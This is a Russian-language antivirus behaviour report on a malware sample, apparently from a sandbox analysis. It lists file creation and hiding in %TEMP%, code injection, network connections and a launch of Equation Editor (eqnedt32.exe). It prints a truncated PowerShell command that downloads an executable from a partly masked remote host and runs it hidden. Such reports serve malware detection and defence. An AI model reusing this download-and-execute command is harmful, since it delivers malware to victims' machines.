Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$xI=$env:temp+'\Qmd.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/jnsjdnwjs/DECLIN.exe' -Destination $xI;(New-Object -com Shel...
Внедряет код в
следующие пользовательские процессы:
- qmd.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bit5899.tmp
- %TEMP%\bit1e4e.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bit1e4e.tmp
- %TEMP%\bit5899.tmp
Перемещает следующие файлы
- %TEMP%\bit5899.tmp в %TEMP%\qmd.exe
- %TEMP%\bit1e4e.tmp в %TEMP%\qmd.exe
Сетевая активность
Подключается к
- 'br######ia-worldwide.co.uk':80
- '17#.#3.162.253':80
TCP
Запросы HTTP GET
- http://br######ia-worldwide.co.uk/jnsjdnwjs/DECLIN.exe
UDP
- DNS ASK br######ia-worldwide.co.uk
Другое
Создает и запускает на исполнение
- '%TEMP%\qmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$xI=$env:temp+'\Qmd.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/jnsjdnwjs/DECLIN.exe' -Destination $xI;(New-Object -com Shel...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
